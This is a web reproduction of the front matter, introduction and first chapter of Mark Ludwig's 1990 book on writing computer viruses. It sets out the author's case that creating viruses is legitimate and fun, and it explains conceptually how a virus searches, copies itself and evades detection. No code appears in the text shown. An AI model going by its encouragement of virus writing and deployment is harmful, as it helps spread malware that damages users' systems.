The little black book of computer viruses @ Amit Mathur Online

	Sign In Sign-Up

Free Web site hosting - Freeservers.com

The Little Black Book

of

Computer Viruses

Volume One:

Part 2 is Here

The Basic Technology

By

Mark A. Ludwig

American Eagle Publications, Inc.

Post Office Box 1507

Show Low, Arizona 85901

1996

A Small Note

I have read this book completely and I have found it very useful. This is a good beginning material for those who want to know the intrecacies of how a virus works and those who want to surprise their friends by creating a virus !

I had found this book long ago on a site the I recenly happened to know no longer exixts. I think a good text such as this shouldbe freely available to everybody and thus, I decided to upload it on my website and distribute it for free. The original copyright notice is attached, and no changes in the text are made except that it has been made in html format, for better view. The images whose reference is given in this book can be found at this page.

Please feel free to distribute this file. You can also read or contribute anything related to this book at the Special Section of Discussion Forum at my website (http://amitmathur.8m.com), started specially for it. You can catch it here

I hope you will enjoy the book !

Amit Mathur
Direct Mail Page
Homepage

Copyright 1990 By Mark A. Ludwig

Virus drawings and cover design by Steve Warner

This electronic edition of The Little Black Book of Computer Viruses is

copyright 1996 by Mark A. Ludwig. This original text file

may be copied freely in unmodified form. Please share it, upload it,

download it, etc. This document may not be distributed in printed form

or modified in any way without written permission from the publisher.

Library of Congress CataloginginPublication Data

Ludwig, Mark A.

The little black book of computer viruses / by Mark A. Ludwig.

p. cm.

Includes bibliographical references (p. ) and index.

ISBN 0929408020 (v. 1) : $14.95

1. Computer viruses I. Title

QA76.76.C68L83 1990

005.8 dc20

And God saw that it was good.

And God blessed them, saying "

"

Genesis 1:21,22

Be fruitful

and multiply.

Preface to the Electronic Edition

The Little Black Book of Computer Viruses has seen five

good years in print. In those five years it has opened a door to

seriously ask the question whether it is better to make technical

information about computer viruses known or not.

When I wrote it, it was largely an experiment. I had no idea

what would happen. Would people take the viruses it contained and

rewrite them to make all kinds of horrificly destructive viruses? Or

would they by and large be used responsibly? At the time I wrote,

no antivirus people would even talk to me, and what I could find

in print on the subject was largely unimpressive from a factual

standpoint---lots of hype and fearmongering, but very little solid

research that would shed some light on what might happen if I

released this book. Being a freedom loving and knowledge seeking

American, I decided to go ahead and do it---write the book and get

it in print. And I decided that if people did not use it responsibly, I

would withdraw it.

Five years later, I have to say that I firmly believe the book

has done a lot more good than harm.

On the positive side, lots and lots of people who desper

ately need this kind of information---people who are responsible

for keeping viruses off of computers---have now been able to get

it. While individual users who have limited contact with other

computer users may be able to successfully protect themselves with

an offtheshelf antivirus, experience seems to be proving that such

is not the case when one starts looking at the network with 10,000

users on it. For starters, very few antivirus systems will run on

10,000 computers with a wide variety of configurations, etc. Sec

ondly, when someone on the network encounters a virus, they have

to be able to talk to someone in the organization who has the

detailed technical knowledge necessary to get rid of it in a rational

way. You can't just shut such a big network down for 4 days while

someone from your av vendor's tech support staff is flown in to

clean up, or to catch and analyze a new virus.

Secondly, people who are just interested in how things

work have finally been able to learn a little bit about computer

viruses. It is truly difficult to deny that they are interesting. The idea

of a computer program that can take off and gain a life completely

independent of its maker is, well, exciting. I think that is important.

After all, many of the most truly useful inventions are made not by

giant, secret, governmentfunded labs, but by individuals who have

their hands on something day in and day out. They think of a way

to do something better, and do it, and it changes the world. However,

that will never happen if you can't get the basic information about

how something works. It's like depriving the carpenter of his

hammer and then asking him to figure out a way to build a better

building.

At the same time, I have to admit that this experiment called

The Little Black Book has not been without its dangers. The Stealth

virus described in its pages has succeeded in establishing itself in

the wild, and, as of the date of this writing it is #8 on the annual

frequency list, which is a concatenation of the most frequently

found viruses in the wild. I am sorry that it has found its way into

the wild, and yet I find here a stroke of divine humor directed at

certain antivirus people. There is quite a history behind this virus.

I will touch on it only briefly because I don't want to bore you with

my personal battles. In the first printing of The Little Black Book,

the Stealth was designed to format an extra track on the disk and

hide itself there. Of course, this only worked on machines that had

a BIOS which did not check track numbers and things like that---

particularly, on old PCs. And then it did not infect disks every time

they were accessed. This limited its ability to replicate. Some

antivirus developers commented to me that they thought this was

The Little Black Book of Computer Viruses

a poor virus for that reason, and suggested I should have done it

differently. I hesitated to do that, I said, because I did not want it to

spread too rapidly.

Not stopping at making such suggestions, though, some of

these same av people lambasted me in print for having published

``lame'' viruses. Fine, I decided, if they are going to criticize the

book like that, we'll improve the viruses. Next round at the printer,

I updated the Stealth virus to work more like the Pakistani Brain,

hiding its sectors in areas marked bad in the FAT table, and to infect

as quickly as Stoned. It still didn't stop these idiotic criticisms,

though. As late as last year, Robert Slade was evaluating this book

in his own virus book and finding it wanting because the viruses it

discussed weren't very successful at spreading. He thought this

objective criticism. From that date forward, it would appear that

Stealth has done nothing but climb the wildlist charts. Combining

aggressive infection techniques with a decent stealth mechanism

has indeed proven effective . . . too effective for my liking, to tell

the truth. It's never been my intention to write viruses that will make

it to the wild list charts. In retrospect, I have to say that I've learned

to ignore idiotic criticism, even when the idiots want to make me

look like an idiot in comparison to their ever inscrutable wisdom.

In any event, the Little Black Book has had five good years

as a print publication. With the release of The Giant Black Book of

Computer Viruses, though, the publisher has decided to take The

Little Black Book out of print. They've agreed to make it available

in a freeware electronic version, though, and that is what you are

looking at now. I hope you'll find it fun and informative. And if you

do, check out the catalog attached to it here for more great infor

mation about viruses from the publisher.

Mark Ludwig

February 22, 1996

Preface to the Electronic Edition

Introduction

This is the first in a series of three books about computer

viruses. In these volumes I want to challenge you to think in new

ways about viruses, and break down false concepts and wrong ways

of thinking, and go on from there to discuss the relevance of

computer viruses in today's world. These books are not a call to a

witch hunt, or manuals for protecting yourself from viruses. On the

contrary, they will teach you how to design viruses, deploy them,

and make them better. All three volumes are full of source code for

viruses, including both new and well known varieties.

It is inevitable that these books will offend some people.

In fact, I hope they do. They need to. I am convinced that computer

viruses are not evil and that programmers have a right to create

them, posses them and experiment with them. That kind of a stand

is going to offend a lot of people, no matter how it is presented.

Even a purely technical treatment of viruses which simply dis

cussed how to write them and provided some examples would be

offensive. The mere thought of a million well armed hackers out

there is enough to drive some bureaucrats mad. These books go

beyond a technical treatment, though, to defend the idea that viruses

can be useful, interesting, and just plain fun. That is bound to prove

even more offensive. Still, the truth is the truth, and it needs to be

spoken, even if it is offensive. Morals and ethics cannot be deter

mined by a majority vote, any more than they can be determined

by the barrel of a gun or a loud mouth. Might does not make right.

If you turn out to be one of those people who gets offended

or upset, or if you find yourself violently disagreeing with some

thing I say, just remember what an athletically minded friend of

mine once told me: ``No pain, no gain.'' That was in reference to

muscle building, but the principle applies intellectually as well as

physically. If someone only listens to people he agrees with, he will

never grow and he'll never succeed beyond his little circle of

yesmen. On the other hand, a person who listens to different ideas

at the risk of offense, and who at least considers that he might be

wrong, cannot but gain from it. So if you are offended by something

in this book, please be critical---both of the book and of yourself---

and don't fall into a rut and let someone else tell you how to think.

From the start I want to stress that I do not advocate

anyone's going out and infecting an innocent party's computer

system with a malicious virus designed to destroy valuable data or

bring their system to a halt. That is not only wrong, it is illegal. If

you do that, you could wind up in jail or find yourself being sued

for millions. However this does not mean that it is illegal to create

a computer virus and experiment with it, even though I know some

people wish it was. If you do create a virus, though, be careful with

it. Make sure you know it is working properly or you may wipe out

your own system by accident. And make sure you don't inadver

tently release it into the world, or you may find yourself in a legal

jam . . . even if it was just an accident. The guy who loses a year's

worth of work may not be so convinced that it was an accident. And

soon it may be illegal to infect a computer system (even your own)

with a benign virus which does no harm at all. The key word here

is responsibility. Be responsible. If you do something destructive,

be prepared to take responsibility. The programs included in this

book could be dangerous if improperly used. Treat them with the

respect you would have for a lethal weapon.

This first of three volumes is a technical introduction to the

basics of writing computer viruses. It discusses what a virus is, and

how it does its job, going into the major functional components of

the virus, step by step. Several different types of viruses are

developed from the ground up, giving the reader practical howto

information for writing viruses. That is also a prerequisite for

decoding and understanding any viruses one may run across in his

2 The Little Black Book of Computer Viruses

day to day computing. Many people think of viruses as sort of a

black art. The purpose of this volume is to bring them out of the

closet and look at them matteroffactly, to see them for what they

are, technically speaking: computer programs.

The second volume discusses the scientific applications of

computer viruses. There is a whole new field of scientific study

known as artificial life (AL) research which is opening up as a result

of the invention of viruses and related entities. Since computer

viruses are functionally similar to living organisms, biology can

teach us a lot about them, both how they behave and how to make

them better. However computer viruses also have the potential to

teach us something about living organisms. We can create and

control computer viruses in a way that we cannot yet control living

organisms. This allows us to look at life abstractly to learn about

what it really is. Wemay even reflect on such great questions as the

beginning and subsequent evolution of life.

The third volume of this series discusses military applica

tions for computer viruses. It is well known that computer viruses

can be extremely destructive, and that they can be deployed with

minimal risk. Military organizations throughout the world know

that too, and consider the possibility of viral attack both a very real

threat and a very real offensive option. Some high level officials in

various countries already believe their computers have been at

tacked for political reasons. So the third volume will probe military

strategies and reallife attacks, and dig into the development of viral

weapon systems, defeating antiviral defenses, etc.

You might be wondering at this point why you should

spend time studying these volumes. After all, computer viruses

apparently have no commercial value apart from their military

applications. Learning how to write them may not make you more

employable, or give you new techniques to incorporate into pro

grams. So why waste time with them, unless you need them to sow

chaos among your enemies? Let me try to answer that: Ever since

computers were invented in the 1940's, there has been a brother

hood of people dedicated to exploring the limitless possibilities of

these magnificent machines. This brotherhood has included famous

mathematicians and scientists, as well as thousands of unnamed

hobbyists who built their own computers, and programmers who

Introduction 3

love to dig into the heart of their machines. As long as computers

have been around, men have dreamed of intelligent machines which

would reason, and act without being told step by step just what to

do. For many years this was purely science fiction. However, the

very thought of this possibility drove some to attempt to make it a

reality. Thus ``artificial intelligence'' was born. Yet AI applications

are often driven by commercial interests, and tend to be colored by

that fact. Typical results are knowledge bases and the like---useful,

sometimes exciting, but also geared toward putting the machine to

use in a specific way, rather than to exploring it on its own terms.

The computer virus is a radical new approach to this idea

of ``living machines.'' Rather than trying to design something which

poorly mimics highly complex human behavior, one starts by trying

to copy the simplest of living organisms. Simple onecelled organ

isms don't do very much. The most primitive organisms draw

nutrients from the sea in the form of inorganic chemicals, and take

energy from the sun, and their only goal is apparently to survive

and to reproduce. They aren't very intelligent, and it would be tough

to argue about their metaphysical aspects like ``soul.'' Yet they do

what they were programmed to do, and they do it very effectively.

If we were to try to mimic such organisms by building a machine---

a little robot---which went around collecting raw materials and

putting them together to make another little robot, we would have

a very difficult task on our hands. On the other hand, think of a

whole new universe---not this physical world, but an electronic one,

which exists inside of a computer. Here is the virus' world. Here it

can ``live'' in a sense not too different from that of primitive

biological life. The computer virus has the same goal as a living

organism---to survive and to reproduce. It has environmental ob

stacles to overcome, which could ``kill'' it and render it inoperative.

And once it is released, it seems to have a mind of its own. It runs

off in its electronic world doing what it was programmed to do. In

this sense it is very much alive.

There is no doubt that the beginning of life was an impor

tant milestone in the history of the earth. However, if one tries to

consider it from the viewpoint of inanimate matter, it is difficult to

imagine life as being much more than a nuisance. We usually

assume that life is good and that it deserves to be protected.

4 The Little Black Book of Computer Viruses

However, one cannot take a step further back and see life as

somehow beneficial to the inanimate world. If we consider only the

atoms of the universe, what difference does it make if the tempera

ture is seventy degrees farenheit or twenty million? What difference

would it make if the earth were covered with radioactive materials?

None at all. Whenever we talk about the environment and ecology,

we always assume that life is good and that it should be nurtured

and preserved. Living organisms universally use the inanimate

world with little concern for it, from the smallest cell which freely

gathers the nutrients it needs and pollutes the water it swims in,

right up to the man who crushes up rocks to refine the metals out

of them and build airplanes. Living organisms use the material

world as they see fit. Even when people get upset about something

like strip mining, or an oil spill, their point of reference is not that

of inanimate nature. It is an entirely selfish concept (with respect

to life) that motivates them. The mining mars the beauty of the

landscape---a beauty which is in the eye of the (living) beholder---

and it makes it uninhabitable. If one did not place a special

emphasis on life, one could just as well promote strip mining as an

attempt to return the earth to its prebiotic state!

I say all of this not because I have a bone to pick with

ecologists. Rather I want to apply the same reasoning to the world

of computer viruses. As long as one uses only financial criteria to

evaluate the worth of a computer program, viruses can only be seen

as a menace. What do they do besides damage valuable programs

and data? They are ruthless in attempting to gain access to the

computer system resources, and often the more ruthless they are,

the more successful. Yet how does that differ from biological life?

If a clump of moss can attack a rock to get some sunshine and grow,

it will do so ruthlessly. We call that beautiful. So how different is

that from a computer virus attaching itself to a program? If all one

is concerned about is the preservation of the inanimate objects

(which are ordinary programs) in this electronic world, then of

course viruses are a nuisance.

But maybe there is something deeper here. That all depends

on what is most important to you, though. It seems that modern

culture has degenerated to the point where most men have no higher

goals in life than to seek their own personal peace and prosperity.

Introduction 5

By personal peace, I do not mean freedom from war, but a freedom

to think and believe whatever you want without ever being chal

lenged in it. More bluntly, the freedom to live in a fantasy world of

your own making. By prosperity, I mean simply an ever increasing

abundance of material possessions. Karl Marx looked at all of

mankind and said that the motivating force behind every man is his

economic well being. The result, he said, is that all of history can

be interpreted in terms of class struggles---people fighting for

economic control. Even though many in our government decry

Marx as the father of communism, our nation is trying to squeeze

into the straight jacket he has laid for us. That is why two of George

Bush's most important campaign promises were ``four more years

of prosperity'' and ``no new taxes.'' People vote their wallets, even

when they know the politicians are lying through the teeth.

In a society with such values, the computer becomes

merely a resource which people use to harness an abundance of

information and manipulate it to their advantage. If that is all there

is to computers, then computer viruses are a nuisance, and they

should be eliminated. Surely there must be some nobler purpose

for mankind than to make money, though, even though that may be

necessary. Marx may not think so. The government may not think

so. And a lot of loudmouthed people may not think so. Yet great

men from every age and every nation testify to the truth that man

does have a higher purpose. Should we not be as Socrates, who

considered himself ignorant, and who sought Truth and Wisdom,

and valued them more highly than silver and gold? And if so, the

question that really matters is not how computers can make us

wealthy or give us power over others, but how they might make us

wise. What can we learn about ourselves? about our world? and,

yes, maybe even about God? Once we focus on that, computer

viruses become very interesting. Might we not understand life a

little better if we can create something similar, and study it, and try

to understand it? And if we understand life better, will we not

understand our lives, and our world better as well?

A word of caution first: Centuries ago, our nation was

established on philosophical principles of good government, which

were embodied in the Declaration of Independence and the Consti

tution. As personal peace and prosperity have become more impor

6 The Little Black Book of Computer Viruses

tant than principles of good government, the principles have been

manipulated and redefined to suit the whims of those who are in

power. Government has become less and less sensitive to civil

rights, while it has become easy for various political and financial

interests to manipulate our leaders to their advantage.

Since people have largely ceased to challenge each other

in what they believe, accepting instead the idea that whatever you

want to believe is OK, the government can no longer get people to

obey the law because everyone believes in a certain set of principles

upon which the law is founded. Thus, government must coerce

people into obeying it with increasingly harsh penalties for disobe

dience---penalties which often fly in the face of long established

civil rights. Furthermore, the government must restrict the average

man's ability to seek recourse. For example, it is very common for

the government to trample all over long standing constitutional

rights when enforcing the tax code. The IRS routinely forces

hundreds of thousands of people to testify against themselves. It

routinely puts the burden of proof on the accused, seizes his assets

without trial, etc., etc. The bottom line is that it is not expedient for

the government to collect money from its citizens if it has to prove

their tax documents wrong. The whole system would break down

in a massive overload. Economically speaking, it is just better to

put the burden of proof on the citizen, Bill of Rights or no.

Likewise, to challenge the government on a question of

rights is practically impossible, unless your case happens to serve

the purposes of some powerful special interest group. In a standard

courtroom, one often cannot even bring up the subject of constitu

tional rights. The only question to be argued is whether or not some

particular law was broken. To appeal to the Supreme Court will cost

millions, if the politically motivated justices will even condescend

to hear the case. So the government becomes practically allpow

erful, God walking on earth, to the common man. One man seems

to have little recourse but to blindly obey those in power.

Whenwe start talking about computer viruses, we're tread

ing on some ground that certain people want to post a ``No Tres

passing'' sign on. The Congress of the United States has considered

a ``Computer Virus Eradication Act'' which would make it a felony

to write a virus, or for two willing parties to exchange one. Never

Introduction 7

mind that the Constitution guarantees freedom of speech and

freedom of the press. Never mind that it guarantees the citizens the

right to bear military arms (and viruses might be so classified).

While that law has not passed as of this writing, it may by the time

you read this book. If so, I will say without hesitation that it is a

miserable tyranny, but one that we can do little about . . . for now.

Some of our leaders may argue that many people are not

capable of handling the responsibility of power that comes with

understanding computer viruses, just as they argue that people are

not able to handle the power of owning assault rifles or machine

guns. Perhaps some cannot. But I wonder, are our leaders any better

able to handle the much more dangerous weapons of law and

limitless might? Obviously they think so, since they are busy trying

to centralize all power into their own hands. I disagree. If those in

government can handle power, then so can the individual. If the

individual cannot, then neither can his representatives, and our end

is either tyranny or chaos anyhow. So there is no harm in attempting

to restore some small power to the individual.

But remember: truth seekers and wise men have been

persecuted by powerful idiots in every age. Although computer

viruses may be very interesting and worthwhile, those who take an

interest in them may face some serious challenges from base men.

So be careful.

Now join with me and take the attitude of early scientists.

These explorers wanted to understand how the world worked---and

whether it could be turned to a profit mattered little. They were

trying to become wiser in what's really important by understanding

the world a little better. After all, what value could there be in

building a telescope so you could see the moons around Jupiter?

Galileo must have seen something in it, and it must have meant

enough to him to stand up to the ruling authorities of his day and

do it, and talk about it, and encourage others to do it. And to land

in prison for it. Today some people are glad he did.

Sowhy not take the same attitude when it comes to creating

life on a computer? One has to wonder where it might lead. Could

there be a whole new world of electronic life forms possible, of

which computer viruses are only the most rudimentary sort? Per

haps they are the electronic analog of the simplest onecelled

8 The Little Black Book of Computer Viruses

creatures, which were only the tiny beginning of life on earth. What

would be the electronic equivalent of a flower, or a dog? Where

could it lead? The possibilities could be as exciting as the idea of a

man actually standing on the moon would have been to Galileo. We

just have no idea.

There is something in certain men that simply drives them

to explore the unknown. When standing at the edge of a vast ocean

upon which no ship has ever sailed, it is difficult not to wonder what

lies beyond the horizon just because the rulers of the day tell you

you're going to fall of the edge of the world (or they're going to

push you off) if you try to find out. Perhaps they are right. Perhaps

there is nothing of value out there. Yet other great explorers down

through the ages have explored other oceans and succeeded. And

one thing is for sure: we'll never know if someone doesn't look. So

I would like to invite you to climb aboard this little raft that I have

built and go exploring. . . .

Introduction 9

The Basics of the Computer Virus

A plethora of negative magazine articles and books have

catalyzed a new kind of hypochondria among computer users: an

unreasonable fear of computer viruses. This hypochondria is pos

sible because a) computers are very complex machines which will

often behave in ways which are not obvious to the average user, and

b) computer viruses are still extremely rare. Thus, most computer

users have never experienced a computer virus attack. Their only

experience has been what they've read about or heard about (and

only the worst problems make it into print). This combination of

ignorance, inexperience and fearprovoking reports of danger is the

perfect formula for mass hysteria.

Most problems people have with computers are simply

their own fault. For example, they accidentally delete all the files

in their current directory rather than in another directory, as they

intended, or they format the wrong disk. Or perhaps someone

routinely does something wrong out of ignorance, like turning the

computer off in the middle of a program, causing files to get

scrambled. Following close on the heels of these kinds of problems

are hardware problems, like a misaligned floppy drive or a hard

disk failure. Such routine problems are made worse than necessary

when users do not plan for them, and fail to back up their work on

a regular basis. This stupidity can easily turn a problem that might

have cost $300 for a new hard disk into a nightmare which will

ultimately cost tens of thousands of dollars. When such a disaster

happens, it is human nature to want to find someone or something

else to blame, rather than admitting it is your own fault. Viruses

have proven to be an excellent scapegoat for all kinds of problems.

Of course, there are times when people want to destroy

computers. In a time of war, a country may want to hamstring their

enemy by destroying their intelligence databases. If an employee

is maltreated by his employer, he may want to retaliate, and he may

not be able to get legal recourse. One can also imagine a totalitarian

state trying to control their citizens' every move with computers,

and a group of good men trying to stop it. Althoughonecould smash

a computer, or physically destroy its data, one does not always have

access to the machine that will be the object of the attack. At other

times, one may not be able to perpetrate a physical attack without

facing certain discovery and prosecution. While an unprovoked

attack, and even revenge, may not be right, people still do choose

such avenues (and even a purely defensive attack is sure to be

considered wrong by an arrogant agressor). For the sophisticated

programmer, though, physical access to the machine is not neces

sary to cripple it.

People who have attacked computers and their data have

invented several different kinds of programs. Since one must obvi

ously conceal the destructive nature of a program to dupe somebody

into executing it, deceptive tricks are an absolute must in this game.

The first and oldest trick is the ``trojan horse.'' The trojan horse may

appear to be a useful program, but it is in fact destructive. It entices

you to execute it because it promises to be a worthwhile program

for your computer---new and better ways to make your machine

more effective---but when you execute the program, surprise! Sec

ondly, destructive code can be hidden as a ``logic bomb'' inside of

an otherwise useful program. You use the program on a regular

basis, and it works well. Yet, when a certain event occurs, such as

a certain date on the system clock, the logic bomb ``explodes'' and

does damage. These programs are designed specifically to destroy

computer data, and are usually deployed by their author or a willing

associate on the computer system that will be the object of the

attack.

There is always a risk to the perpetrator of such destruction.

He must somehow deploy destructive code on the target machine

without getting caught. If that means he has to put the program on

11 The Little Black Book of Computer Viruses

the machine himself, or give it to an unsuspecting user, he is at risk.

The risk may be quite small, especially if the perpetrator normally

has access to files on the system, but his risk is never zero.

With such considerable risks involved, there is a powerful

incentive to develop cunning deployment mechanisms for getting

destructive code onto a computer system. Untraceable deployment

is a key to avoiding being put on trial for treason, espionage, or

vandalism. Among the most sophisticated of computer program

mers, the computer virus is the vehicle of choice for deploying

destructive code. That is why viruses are almost synonymous with

wanton destruction.

However, we must realize that computer viruses are not

inherently destructive. The essential feature of a computer program

that causes it to be classified as a virus is not its ability to destroy

data, but its ability to gain control of the computer and make a fully

functional copy of itself. It can reproduce. When it is executed, it

makes one or more copies of itself. Those copies may later be

executed, to create still more copies, ad infinitum. Not all computer

programs that are destructive are classified as viruses because they

do not all reproduce, and not all viruses are destructive because

reproduction is not destructive. However, all viruses do reproduce.

The idea that computer viruses are always destructive is deeply

ingrained in most people's thinking though. The very term ``virus''

is an inaccurate and emotionally charged epithet. The scientifically

correct term for a computer virus is ``selfreproducing automaton,''

or ``SRA'' for short. This term describes correctly what such a

program does, rather than attaching emotional energy to it. We will

continue to use the term ``virus'' throughout this book though,

except when we are discussing computer viruses (SRA's) and

biological viruses at the same time, and we need to make the

difference clear.

If one tries to draw an analogy between the electronic world

of programs and bytes inside a computer and the physical world we

know, the computer virus is a very close analog to the simplest

biological unit of life, a single celled, photosynthetic organism.

Leaving metaphysical questions like ``soul'' aside, a living organ

ism can be differentiated from nonlife in that it appears to have

two goals: (a) to survive, and (b) to reproduce. Although one can

The Basics of the Computer Virus 12

raise metaphysical questions just by saying that a living organism

has ``goals,'' they certainly seem to, if the onlooker has not been

educated out of that way of thinking. And certainly the idea of a

goal would apply to a computer program, since it was written by

someone with a purpose in mind. So in this sense, a computer virus

has the same two goals as a living organism: to survive and to

reproduce. The simplest of living organisms depend only on the

inanimate, inorganic environment for what they need to achieve

their goals. They draw raw materials from their surroundings, and

use energy from the sun to synthesize whatever chemicals they need

to do the job. The organism is not dependent on another form of life

which it must somehow eat, or attack to continue its existence. In

the same way, a computer virus uses the computer system's re

sources like disk storage and CPU time to achieve its goals. Spe

cifically, it does not attack other selfreproducing automata and

``eat'' them in a manner similar to a biological virus. Instead, the

computer virus is the simplest unit of life in this electronic world

inside the computer. (Of course, it is conceivable that one could

write a more sophisticated program which would behave like a

biological virus, and attack other SRA's.)

Before the advent of personal computers, the electronic

domain in which a computer virus might ``live'' was extremely

limited. Computers were rare, and they had many different kinds

of CPU's and operating systems. So a tinkerer might have written

a virus, and let it execute on his system. However, there would have

been little danger of it escaping and infecting other machines. It

remained under the control of its master. The age of the masspro

duced computer opened up a whole new realm for viruses, though.

Millions of machines all around the world, all with the same basic

architecture and operating system make it possible for a computer

virus to escape and begin a life of its own. It can hop from machine

to machine, accomplishing the goals programmed into it, with no

one to control it and few who can stop it. And so the virus became

a viable form of electronic life in the 1980's.

Now one can create selfreproducing automata that are not

computer viruses. For example, the famous mathematician John

von Neumann invented a selfreproducing automaton ``living'' in a

grid array of cells which had 29 possible states. In theory, this

13 The Little Black Book of Computer Viruses

automaton could be modeled on a computer. However, it was not a

program that would run directly on any computer known in von

Neumann's day. Likewise, one could write a program which simply

copied itself to another file. For example ``1.COM'' could create

``2.COM'' which would be an exact copy of itself (both program

files on an IBM PC style machine.) The problem with such concoc

tions is viability. Their continued existence is completely depend

ent on the man at the console. Amore sophisticated version of such

a program might rely on deceiving that man at the console to

propagate itself. This program is known as a worm. The computer

virus overcomes the roadblock of operator control by hiding itself

in other programs. Thus it gains access to the CPU simply because

people run programs that it happens to have attached itself to

without their knowledge. The ability to attach itself to other pro

grams is what makes the virus a viable electronic life form. That is

what puts it in a class by itself. The fact that a computer virus

attaches itself to other programs earned it the name ``virus.'' How

ever that analogy is wrong since the programs it attaches to are not

in any sense alive.

Types of Viruses

Computer viruses can be classified into several different

types. The first and most common type is the virus which infects

any application program. On IBM PC's and clones running under

PCDOS or MSDOS,most programs and data which do not belong

to the operating system itself are stored as files. Each file has a file

name eight characters long, and an extent which is three characters

long. A typical file might be called ``TRUE.TXT'', where ``TRUE''

is the name and ``TXT'' is the extent. The extent normally gives

some information about the nature of a file---in this case

``TRUE.TXT'' might be a text file. Programs must always have an

extent of ``COM'', ``EXE'', or ``SYS''. Under DOS, only files with

these extents can be executed by the central processing unit. If the

user tries to execute any other type of file, DOS will generate an

error and reject the attempt to execute the file.

The Basics of the Computer Virus 14

Since a virus' goal is to get executed by the computer, it

must attach itself to a COM, EXE or SYS file. If it attaches to any

other file, it may corrupt some data, but it won't normally get

executed, and it won't reproduce. Since each of these types of

executable files has a different structure, a virus must be designed

to attach itself to a particular type of file. A virus designed to attack

COM files cannot attack EXE files, and vice versa, and neither can

attack SYS files. Of course, one could design a virus that would

attack twoor even three kinds of files, but it would require a separate

reproduction method for each file type.

The next major type of virus seeks to attach itself to a

specific file, rather than attacking any file of a given type. Thus, we

might call it an applicationspecific virus. These viruses make use

of a detailed knowledge of the files they attack to hide better than

would be possible if they were able to infiltrate just any file. For

example, they might hide in a data area inside the program rather

than lengthening the file. However, in order to do that, the virus

must know where the data area is located in the program, and that

differs from program to program.

This second type of virus usually concentrates on the files

associated to DOS, like COMMAND.COM, since they are on

virtually every PC in existence. Regardless of which file such a

virus attacks, though, it must be very, very common, or the virus

will never be able to find another copy of that file to reproduce in,

and so it will not go anywhere. Only with a file like COM

MAND.COM would it be possible to begin leaping from machine

to machine and travel around the world.

The final type of virus is known as a ``boot sector virus.''

This virus is a further refinement of the applicationspecific virus,

which attacks a specific location on a computer's disk drive, known

as the boot sector. The boot sector is the first thing a computer loads

into memory from disk and executes when it is turned on. By

attacking this area of the disk, the virus can gain control of the

computer immediately, every time it is turned on, before any other

program can execute. In this way, the virus can execute before any

other program or person can detect its existence.

15 The Little Black Book of Computer Viruses

The Functional Elements of a Virus

Every viable computer virus must have at least two basic

parts, or subroutines, if it is even to be called a virus. Firstly, it must

contain a search routine, which locates new files or new areas on

disk which are worthwhile targets for infection. This routine will

determine how well the virus reproduces, e.g., whether it does so

quickly or slowly, whether it can infect multiple disks or a single

disk, and whether it can infect every portion of a disk or just certain

specific areas. As with all programs, there is a size versus function

ality tradeoff here. The more sophisticated the search routine is, the

more space it will take up. So although an efficient search routine

may help a virus to spread faster, it will make the virus bigger, and

that is not always so good.

Secondly, every computer virus must contain a routine to

copy itself into the area which the search routine locates. The copy

routine will only be sophisticated enough to do its job without

getting caught. The smaller it is, the better. How small it can be will

depend on how complex a virus it must copy. For example, a virus

which infects only COM files can get by with a much smaller copy

routine than a virus which infects EXE files. This is because the

EXE file structure is muchmore complex, so the virus simply needs

to do more to attach itself to an EXE file.

While the virus only needs to be able to locate suitable

hosts and attach itself to them, it is usually helpful to incorporate

some additional features into the virus to avoid detection, either by

the computer user, or by commercial virus detection software.

Antidetection routines can either be a part of the search or copy

routines, or functionally separate from them. For example, the

search routine may be severely limited in scope to avoid detection.

A routine which checked every file on every disk drive, without

limit, would take a long time and cause enough unusual disk activity

that an alert user might become suspicious. Alternatively, an anti

detection routine might cause the virus to activate under certain

special conditions. For example, it might activate only after a

certain date has passed (so the virus could lie dormant for a time).

The Basics of the Computer Virus 16

Alternatively, it might activate only if a key has not been pressed

for five minutes (suggesting that the user was not there watching

his computer).

Search, copy, and antidetection routines are the only nec

essary components of a computer virus, and they are the compo

nents which we will concentrate on in this volume. Of course, many

computer viruses have other routines added in on top of the basic

three to stop normal computer operation, to cause destruction, or

to play practical jokes. Such routines may give the virus character,

but they are not essential to its existence. In fact, such routines are

usually very detrimental to the virus' goal of survival and selfre

production, because they make the fact of the virus' existence

known to everybody. If there is just a little more disk activity than

expected, no one will probably notice, and the virus will go on its

merry way. On the other hand, if the screen to one's favorite

program comes up saying ``Ha! Gotcha!'' and then the whole

VIRUS

Antidetection

routines

Search Copy

Figure 1: Functional diagram of a virus.

17 The Little Black Book of Computer Viruses

computer locks up, with everything on it ruined, most anyone can

figure out that they've been the victim of a destructive program.

And if they're smart, they'll get expert help to eradicate it right

away. The result is that the viruses on that particular system are

killed off, either by themselves or by the clean up crew.

Although it may be the case that anything which is not

essential to a virus'survival may prove detrimental, many computer

viruses are written primarily to be smart delivery systems of these

``other routines.'' The author is unconcerned about whether the virus

gets killed in action when its logic bomb goes off, so long as the

bomb gets deployed effectively. The virus then becomes just like a

Kamikaze pilot, who gives his life to accomplish the mission. Some

of these ``other routines'' have proven to be quite creative. For

example, one well known virus turns a computer into a simulation

of a wash machine, complete with graphics and sound. Another

makes Friday the 13th truly a bad day by coming to life only on

that day and destroying data. None the less, these kinds of routines

are more properly the subject of volume three of this series, which

discusses the military applications of computer viruses. In this

volume we will stick with the basics of designing the reproductive

system. And if you're real interest is in military applications, just

remember that the best logic bomb in the world is useless if you

can't deploy it correctly. The delivery system is very, very impor

tant. The situation is similar to having an atomic bomb, but not the

means to send it half way around the world in fifteen minutes. Sure,

you can deploy it, but crossing borders, getting close to the target,

and hiding the bomb all pose considerable risks. The effort to

develop a rocket is worthwhile.

Tools Needed for Writing Viruses

Viruses are written in assembly language. High level lan

guages like Basic, C, and Pascal have been designed to generate

standalone programs, but the assumptions made by these lan

guages render them almost useless when writing viruses. They are

simply incapable of performing the acrobatics required for a virus

to jump from one host program to another. That is not to say that

The Basics of the Computer Virus 18

one could not design a high level language that would do the job,

but no one has done so yet. Thus, to create viruses, we must use

assembly language. It is just the only way we can get exacting

control over all the computer system's resources and use them the

way we want to, rather than the way somebody else thinks we

should.

If you have not done any programming in assembler before,

I would suggest you get a good tutorial on the subject to use along

side of this book. (A few are mentioned in the Suggested Reading

at the end of the book.) In the following chapters, I will assume that

your knowledge of the technical details of PC's---like file struc

tures, function calls, segmentation and hardware design---is lim

ited, and I will try to explain such matters carefully at the start.

However, I will assume that you have some knowledge of assembly

language---at least at the level where you can understand what some

of the basic machine instructions, like mov ax,bx do. If you are not

familiar with simpler assembly language programming like this,

get a tutorial book on the subject. With a little work it will bring

you up to speed.

